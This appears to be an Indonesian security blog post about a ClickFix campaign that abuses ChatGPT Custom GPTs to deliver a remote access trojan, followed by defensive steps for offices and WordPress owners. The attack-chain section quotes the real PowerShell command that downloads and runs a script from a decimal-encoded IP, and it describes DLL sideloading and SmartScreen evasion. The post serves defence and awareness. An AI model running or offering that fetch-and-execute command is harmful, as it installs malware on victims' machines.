Malware ChatGPT Custom GPT: Serangan ClickFix “Plus 5.6” yang Menyamar di Domain Asli dan Cara Menangkalnya
Malware ChatGPT Custom GPT: Serangan ClickFix “Plus 5.6” yang Menyamar di Domain Asli dan Cara Menangkalnya
Senin pagi, seorang staf administrasi di sebuah kantor Jakarta membuka Google untuk mencari ChatGPT. Di baris paling atas ada iklan dengan alamat chatgpt.com yang asli. Klik. Halaman terbuka, tampilan resmi, logo benar. Ia mengirim satu pertanyaan kerjaan, lalu balasan datang bukan jawaban, melainkan pemberitahuan bahwa layanan sedang terbatas dan menyarankan tautan cadangan. Klik lagi. Muncul halaman pemeriksaan CAPTCHA berwarna biru khas Cloudflare, lengkap dengan instruksi singkat: salin perintah ini, buka Terminal, tempel, tekan Enter. Tiga puluh detik kemudian komputer terlihat normal seperti biasa. Tidak ada jendela error, tidak ada file aneh yang muncul di desktop.
Yang tidak diketahui orang itu: perintah yang ia tempel sudah mengunduh penginstal diam-diam, dan sesi jarak jauh untuk pengendali jahat sudah terbuka di komputer kantornya.
Skenario di atas dirangkum dari kampanye yang didokumentasikan tim riset keamanan Huntress pada 28 September 2026, lalu diberitakan SecurityWeek sehari kemudian. Yang membuat cerita ini berbeda dari phishing biasa adalah satu kalimat kunci: korban tidak mengunjungi situs palsu. Mereka berada di domain resmi chatgpt.com, memakai fitur resmi ChatGPT bernama Custom GPT, dan tetap tertipu.
Apa itu Custom GPT dan kenapa ia jadi senjata
Custom GPT adalah fitur resmi OpenAI yang memungkinkan siapa pun membuat versi khusus ChatGPT untuk tujuan tertentu: membantu menulis caption, menjawab pertanyaan pelanggan, atau menganalisis dokumen. Custom GPT hidup di alamat chatgpt.com, menampilkan nama buatan di bagian atas, dan di bawahnya tertulis siapa pembuatnya. OpenAI menyebutnya “community builder”, pengembang komunitas.
Masalahnya, siapa pun boleh membuatnya, dan siapa pun yang membuka halamannya melihat domain yang sama sekali sah. Menurut laporan Huntress, penyerang membuat dua Custom GPT dengan nama “Plus 5.6”, sengaja dibuat mirip nama model buatan resmi. Begitu pengguna mengetik apa pun, GPT itu selalu membalas dengan pesan yang sama: pemberitahuan “Service Availability Notice” bahwa domain utama sedang terbatas, dan pengguna diminta melanjutkan lewat domain cadangan.
Domain cadangan itulah jebakannya: sebuah halaman Google Sites yang menampilkan pemeriksaan Cloudflare dan ChatGPT palsu. Halaman itu memicu teknik yang oleh Microsoft diberi nama ClickFix, yaitu trik sosial di mana korban diminta memecahkan masalah kecil dengan cara menjalankan perintah sendiri. Tidak ada lampiran berbahaya yang perlu dipindai antivirus. Tidak ada file mencurigakan yang perlu diklik. Korban sendirilah yang menyalakan pintunya.
Rantai serangannya, tahap demi tahap
Tim Huntress menelusuri setidaknya 40 insiden yang terhubung ke halaman Google Sites itu, dan dua di antaranya dikonfirmasi berasal langsung dari Custom GPT. Berikut jalannya, disusun dari laporan teknis mereka:
- <strong>Pintu masuk lewat iklan berbayar.</strong> Sebagian korban datang dari hasil pencarian Google untuk kata kunci “chatgpt” yang berbayar, lalu mendarat di Custom GPT buatan penyerang di domain chatgpt.com. Domain asli, tampilan asli, niat jahat.
- <strong>Peralihan ke “domain cadangan”.</strong> GPT mengarahkan korban ke halaman Google Sites yang menyamar sebagai pemeriksaan CAPTCHA.
- <strong>ClickFix: korban menempel perintah.</strong> Halaman itu meminta korban membuka Terminal atau PowerShell dan menempelkan perintah berikut:
powershell.exe -ExecutionPolicy Bypass “irm 1614733393/12 | Out-File $env:temp\1777.ps1; & $env:temp\1777.ps1”

Angka 1614733393 bukan nama domain, melainkan alamat IP dalam bentuk desimal, yaitu 96.62.224.81. Trik ini dipakai agar penyaring yang mencari pola alamat IP biasa tidak menangkapnya.
- <strong>Penginstal diam-diam.</strong> Skrip yang terunduh terbagi dalam dua lapisan pengaburan, lalu menarik berkas <code>ISOSimple.msi</code> yang dipasang senyap dengan <code>msiexec /qn</code>. Penginstal ini menyamar sebagai “Advanced Printer Configuration Reader”, dan sebuah opsi konfigurasi disembunyikan dari daftar Program dan Fitur sehingga pengguna tidak menyadari ada yang baru terpasang.
- <strong>Menyamar memakai tanda tangan resmi.</strong> Di sinilah bagian paling rapi. Penginstal menjalankan <code>COTFileReadApp.exe</code>, aplikasi asli buatan Canon yang tanda tangannya sah, lalu memuat DLL buatan penyerang dari folder yang sama. Karena Windows memuat DLL dari folder aplikasinya lebih dulu, kode jahat masuk ke dalam proses yang terlihat tepercaya. Deteksi berbasis nama berkas jadi tidak berguna.
- <strong>Bertahan mesin dimatikan.</strong> Dua mekanisme pemasangan kembali dipasang: entri di Run key dan tugas terjadwal, keduanya diberi nama “Canon Configuration Reader”. Menghapus satu, yang lain menghidupkannya lagi.
- <strong>Muatan akhirnya adalah RAT.</strong> Remote Access Trojan yang mampu mengendalikan desktop jarak jauh, merekam audio dan video, menjalankan berkas tambahan, hingga membuang muatan lanjutan. Komunikasi dengan server pengendali memakai DNS-over-HTTPS lewat Cloudflare, Google, dan Quad9 sehingga pelacakan lewat DNS biasa tidak melihat apa pun.
Gelombang kedua: kostum baru, muatan yang sama
Ketika OpenAI menurunkan Custom GPT pertama pada 25 September 2026 setelah laporan Huntress, penyerang tidak panik. Dua hari kemudian, tepatnya 27 September, muncul Custom GPT baru dengan nama yang sama persis. Muatan akhirnya identik, byte per byte, tetapi kostumnya berganti total. Kali ini tuan rumahnya <code>DeElevate64.exe</code> milik Stardock, juga aplikasi bertanda tangan sah, dan pemuatnya dipindahkan ke dalam paket Microsoft NuGet bernama <code>Build.dat</code> yang berbentuk seperti berkas proyek biasa.
Beberapa peningkatan lain ikut menyertai: pengunduhan dibagi menjadi dua tahap dengan agen pengguna Chrome yang dipalsukan, berkas MSI dilepas dari tanda “Mark-of-the-Web” Windows agar peringatan SmartScreen tidak muncul, proses unduh diulang hingga tiga kali, dan ada pemeriksaan lingkungan uji yang membuat muatan memilih membuka jendela berbahaya kosong alih-alih membuka diri di depan peneliti.
Pesan dari gelombang kedua ini jelas: deteksi yang mengandalkan nama berkas Canon atau daftar alamat yang dibekukan akan meleset begitu penyerang berganti baju. Yang perlu dipantau adalah perilakunya, bukan labelnya.
Kenapa ini urusan kantor UMKM, bukan urusan “orang IT”
Di Indonesia, cerita ini praktis belum ada pembahasannya. Pencarian dengan frasa bahasa Indonesia seputar serangan ini tidak menemukan satu pun artikel yang mengulas kampanye ini secara utuh, sementara media keamanan luar negeri sudah membahasnya sejak 28 September. Artinya, staf kantor yang membuka ChatGPT setiap hari untuk menulis caption, menyusun surel pelanggan, atau membuat draf penawaran sama sekali tidak punya peringatan dalam bahasanya sendiri.
Di situlah letak bahayanya. Phishing konvensional masih bisa dikenali dari alamat situs yang salah eja atau bahasa yang aneh. Kasus ini kebalikannya: alamatnya benar, tampilannya benar, dan yang diminta hanya satu tindakan kecil yang terasa seperti prosedur keamanan biasa. Menempel perintah di terminal terdengar hal teknis, tetapi halaman itu merangkainya sebagai langkah wajib pemeriksaan CAPTCHA. Korban merasa sedang patuh pada sistem, bukan sedang menjalankan program berbahaya.
Teknik ClickFix sendiri memang sedang menanjak sepanjang 2026. Pada akhir Agustus 2026 Microsoft sudah memperingatkan varian bernama TerminalFix yang juga memakai tiruan pemeriksaan Cloudflare, tetapi memindahkan perintah dari dialog Run ke Terminal. Bedanya, kali ini pintu masuknya dihiasi logo platform AI yang sedang dipercaya jutaan orang.
Sebagai penyedia jasa IT support, saya menemui pola yang sama di lapangan: komputer kantor terinfeksi bukan karena pengguna lalai membuka tautan aneh, melainkan karena mereka sedang mencari sesuatu yang sah dan terburu-buru. Situasi “sedang sibuk, segera selesaikan” adalah kondisi favorit teknik ini.
Pemeriksaan jujur di rumah sendiri
Kebetulan topik ini menyentuh infrastruktur, jadi saya cek kondisi server antond.net sebelum menulis. Hasilnya: situs sudah berjalan di WordPress 7.1.2, versi patch terbaru yang juga menambal celah kritis CVE-2026-87902 yang saya bahas pada 28 September 2026, dengan WooCommerce 10.4.4 dan tema Arter. Header <code>content-security-policy</code> terpasang minimalis dalam bentuk <code>upgrade-insecure-requests</code>.

Satu catatan kecil yang saya temukan untuk diri sendiri: meta generator masih menampilkan nomor versi WordPress di kode halaman. Itu bukan celah yang bisa dipakai menembus situs selama versinya sudah terbaru, tetapi menyembunyikan informasi versi adalah kebersihan kecil yang biasa saya kerjakan untuk klien. Saya catat untuk diperbaiki, dan jujur menyebutkannya di sini karena itulah cara menulis panduan keamanan yang benar.
Enam langkah yang bisa dikerjakan minggu ini
- <strong>Tanamkan satu aturan yang tidak boleh dilanggar.</strong> Pemeriksaan CAPTCHA yang sah tidak pernah meminta pengguna menyalin perintah ke Terminal, PowerShell, atau dialog Run. Tulis satu kalimat ini di panduan tim dan tempel di monitor. Kalimat ini menggantikan pelatihan panjang.
- <strong>Batasi siapa yang boleh menjalankan PowerShell.</strong> Untuk kantor dengan pengguna biasa, kebijakan AppLocker atau aturan App Execution Alias di Windows cukup untuk menutup jalur ini tanpa mengganggu pekerjaan harian. Komputer desainer atau akuntan tidak membutuhkan PowerShell untuk membuat caption atau membuka laporan.
- <strong>Periksa jejaknya secara mandiri.</strong> Buka Task Scheduler dan jalankan pencarian “Canon Configuration Reader”, cek entri Startup di Task Manager, lalu lihat folder <code>%LOCALAPPDATA%\Programs</code>. Ketiga pemeriksaan ini bisa dilakukan tanpa perangkat lunak tambahan dan menyelesaikan kasus pemasangan kembali yang licin.
- <strong>Kalau terlanjur, urutannya penting.</strong> Putuskan komputer dari jaringan kabel dan Wi-Fi lebih dulu, jangan matikan dulu karena jejak di memori ikut hilang. Dari perangkat lain, ganti kata sandi surel, akun iklan, dan akun kasir yang pernah dibuka di komputer itu. RAT ini mampu merekam audio, video, dan menyalin berkas, jadi asumsikan semua kredensial yang diketik di mesin itu bocor. Baru setelah itu jalankan pindai penuh dan pulihkan dari cadangan.
- <strong>Blokir jalur percaya yang salah.</strong> Arahkan semua akses ChatGPT ke alamat resmi dan simpan sebagai penanda, bukan mengklik iklan berbayar di atas hasil pencarian. OpenAI tidak pernah meminta pengguna menjalankan perintah sistem untuk memulihkan layanan, dan tidak pernah mengarahkan pengguna ke domain cadangan lewat halaman pihak ketiga.
- <strong>Briefing lima belas menit.</strong> Sisihkan satu waktu rapat mingguan untuk menceritakan satu kasus nyata beserta tangkapan layarnya. Karyawan yang pernah melihat bentuk serangannya akan mengenali polanya di lain waktu, dan pengenalan pola jauh lebih awet daripada larangan abstrak.
Kaitannya dengan website Anda sendiri
Ada satu sisi yang sering terlewat ketika orang membahas serangan semacam ini: halaman ClickFix tidak selalu lahir dari iklan atau platform AI. Dalam varian TerminalFix yang diperingatkan Microsoft pada Agustus 2026, penyerang memasang tiruan pemeriksaan Cloudflare di dalam situs yang sudah mereka bobol, lalu menunggu pengunjung sah situs itu datang. Situs toko yang tidak terawat bisa berubah menjadi pancingan bagi pelanggannya sendiri.
Untuk pemilik website, ini menautkan dua pekerjaan yang selama ini terasa terpisah, yaitu keamanan website dan keamanan komputer. Website yang dibiarkan usang, penuh plugin tanpa pembaruan, atau menyimpan berkas unggahan yang tidak dicek bukan lagi sekadar soal ranking dan kepercayaan pelanggan. Ia bisa menjadi pintu depan menuju komputer pelanggan. Di situlah alasan teknis kenapa saya selalu menganjurkan pembaruan WordPress, tema, dan plugin dilakukan secara rutin dengan cadangan yang siap dipulihkan, bukan ditunda sampai ada masalah.

Pemeriksaan sederhana yang bisa dilakukan sendiri: buka daftar plugin di dashboard, pastikan tidak ada yang bertahun-tahun tanpa pembaruan, lalu telusuri folder <code>wp-content/uploads</code> dan pastikan tidak ada berkas <code>.php</code> yang tidak sengaja terunggah. Untuk website yang ditangani klien, dua pemeriksaan ini yang paling sering menemukan masalah sebelum pelanggan menyadarinya.
Penutup
Kabar baiknya, kasus ini tidak menuntut keahlian keamanan tinggi untuk dicegah. Tidak ada sistem yang sempurna, tetapi satu kebiasaan menutup sebagian besar celah: tidak ada pemeriksaan yang sah meminta kita menjalankan perintah. Kalimat itulah yang perlu diulang saat rapat tim, ditempel di monitor, dan diingatkan kembali setiap kali muncul halaman yang meminta langkah aneh dengan alasan verifikasi.
Komputer kantor Anda mungkin hari ini masih aman-aman saja. Yang berubah setelah membaca artikel ini hanya satu: sekarang Anda tahu persis apa yang harus dicurigai begitu ada yang menyuruh Anda menempel perintah ke terminal.
<strong>Sumber:</strong>
- Huntress, “Attackers Abuse ChatGPT Custom GPTs to Deliver RAT via ClickFix”, 28 September 2026
- SecurityWeek, “Hackers Use ChatGPT Custom GPTs in ClickFix Attacks”, 29 September 2026
- CyberSecurityNews dan SOC Prime, pelaporan independen rantai infeksi, 29 September 2026
- Microsoft, peringatan kampanye TerminalFix varian ClickFix, Agustus 2026